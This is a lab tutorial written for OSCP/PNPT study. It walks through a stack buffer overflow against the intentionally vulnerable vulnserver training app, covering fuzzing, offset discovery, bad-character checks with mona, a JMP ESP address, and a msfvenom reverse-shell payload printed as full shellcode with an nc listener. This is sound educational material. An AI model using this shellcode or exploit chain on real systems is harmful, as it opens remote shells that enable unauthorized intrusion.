Buffer Over Flow

This write up is about Buffer over flow which is an indispensable for the guys preparing for OSCP/PNPT. Here we tried to cover step by step BOF of a vulnerable server.

Get vulnerable server

GitHub - stephenbradshaw/vulnserver: Vulnerable server used for learning software exploitation

Run server at port 9999

write py code and connect

we can check same response for verification from kali

nc 192.168.100.7 9999

send “HELP” from code

output

here we can see various commands which we can use to check or verify overflow

for this test we are using TRUN command

syntax for TRUN

payload = ‘TRUN /. :/’ + junk

now send junk bytes to check approx. value when server crush

Open the application in immunity debugger

(Run fuzzer.py from script to show fuzzing)

Crashed at 2000 bytes

Running process

Send 5000 A in the process

can see process crashed

can see all A here on ESP and EIP ( 41 Hexa — of value A)

Using pattern generation script to create pattern (can use other options metasploit or mona)

value 5000

out unique payload is created

copy this payload in script

now send pattern to vulnserver from script

Variable use pat =

we can see server is crushed

Go to ESP and right click and “follow in stack”

in stack right click and copy to clipboard

009CF9C8 417A6F32 2ozA esp

we can notice the EIP value, just top of ESP value

009CF9C4 4B594237 7BYK EIP

make sure application is running

now we will find out the index of bytes in eip and esp

comment s.send (payload)

rerun the application

run script

after running we can see index number

which shows EIP 2003 and ESP 2007

which means after 2003 A value of EIP start and ESP start at 2007

for confirmation we will alter the script and send it

junk = ‘A’ *2003

eip= ‘B’*4

esp=’c’*4

junk2 = ‘D’*(5000 — len(junk+eip+esp)

payload = ‘TRUN /.:/’ + junk + eip + esp + junk2

make sure application is running

after running code server crashed

see ESP all C and EIP all B which we send so its verified offset is right

FIND BAD CHARACTER

!mona config -set workingfolder C:\mona\%p

!mona bytearray -b “\x00”

created file here in folder

copy characters from the file bytearray.txt to code

create new variable allchars

send allchars in esp

Run program again

!mona compare -f C:\mona\vulnserver\bytearray.bin -a 00AAF9C8

00AAF9C8 : memory address of ESP

memory comparison result.

Unmodified means no extra bad character identified. So only bad character is “\X00”

it shows no value, which means only \x00 was null character which we initially excluded.

Restart the application

!mona jmp -r esp –cpb “\x “+00”

check why this is done: find the address of esp

625011AF

change the code with esp memory address

625011AF

since there is no bad character we can safely use this esp address

add nops 2 rows

esp = ‘\x90’*16

esp += ()

prepare shellcode in kali with metaspolit

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.5 lport=4444 -a x86 “\x00” -f c

code the shell code

unsigned char buf[] =

“\xba\x3f\x6b\x79\x15\xdb\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1”

“\x52\x83\xc0\x04\x31\x50\x0e\x03\x6f\x65\x9b\xe0\x73\x91\xd9”

“\x0b\x8b\x62\xbe\x82\x6e\x53\xfe\xf1\xfb\xc4\xce\x72\xa9\xe8”

“\xa5\xd7\x59\x7a\xcb\xff\x6e\xcb\x66\x26\x41\xcc\xdb\x1a\xc0”

“\x4e\x26\x4f\x22\x6e\xe9\x82\x23\xb7\x14\x6e\x71\x60\x52\xdd”

“\x65\x05\x2e\xde\x0e\x55\xbe\x66\xf3\x2e\xc1\x47\xa2\x25\x98”

“\x47\x45\xe9\x90\xc1\x5d\xee\x9d\x98\xd6\xc4\x6a\x1b\x3e\x15”

“\x92\xb0\x7f\x99\x61\xc8\xb8\x1e\x9a\xbf\xb0\x5c\x27\xb8\x07”

“\x1e\xf3\x4d\x93\xb8\x70\xf5\x7f\x38\x54\x60\xf4\x36\x11\xe6”

“\x52\x5b\xa4\x2b\xe9\x67\x2d\xca\x3d\xee\x75\xe9\x99\xaa\x2e”

“\x90\xb8\x16\x80\xad\xda\xf8\x7d\x08\x91\x15\x69\x21\xf8\x71”

“\x5e\x08\x02\x82\xc8\x1b\x71\xb0\x57\xb0\x1d\xf8\x10\x1e\xda”

“\xff\x0a\xe6\x74\xfe\xb4\x17\x5d\xc5\xe1\x47\xf5\xec\x89\x03”

“\x05\x10\x5c\x83\x55\xbe\x0f\x64\x05\x7e\xe0\x0c\x4f\x71\xdf”

“\x2d\x70\x5b\x48\xc7\x8b\x0c\xb7\xb0\xf7\xc9\x5f\xc3\xf7\xc0”

“\xc3\x4a\x11\x88\xeb\x1a\x8a\x25\x95\x06\x40\xd7\x5a\x9d\x2d”

“\xd7\xd1\x12\xd2\x96\x11\x5e\xc0\x4f\xd2\x15\xba\xc6\xed\x83”

“\xd2\x85\x7c\x48\x22\xc3\x9c\xc7\x75\x84\x53\x1e\x13\x38\xcd”

“\x88\x01\xc1\x8b\xf3\x81\x1e\x68\xfd\x08\xd2\xd4\xd9\x1a\x2a”

“\xd4\x65\x4e\xe2\x83\x33\x38\x44\x7a\xf2\x92\x1e\xd1\x5c\x72”

“\xe6\x19\x5f\x04\xe7\x77\x29\xe8\x56\x2e\x6c\x17\x56\xa6\x78”

“\x60\x8a\x56\x86\xbb\x0e\x66\xcd\xe1\x27\xef\x88\x70\x7a\x72”

“\x2b\xaf\xb9\x8b\xa8\x45\x42\x68\xb0\x2c\x47\x34\x76\xdd\x35”

“\x25\x13\xe1\xea\x46\x36”;

paste shellcode in the py code esp

esp += (shellcode)

create listener on port 4444

payload = ‘TRUN /.:/’ + junk + eip + nop + esp + junk2

nc -nvlp 4444

make sure application running

after executing the program, we will get reverse shell executed

Hope this will helpful. Happy Hacking :)

DM me if stuck anywhere or needs help :)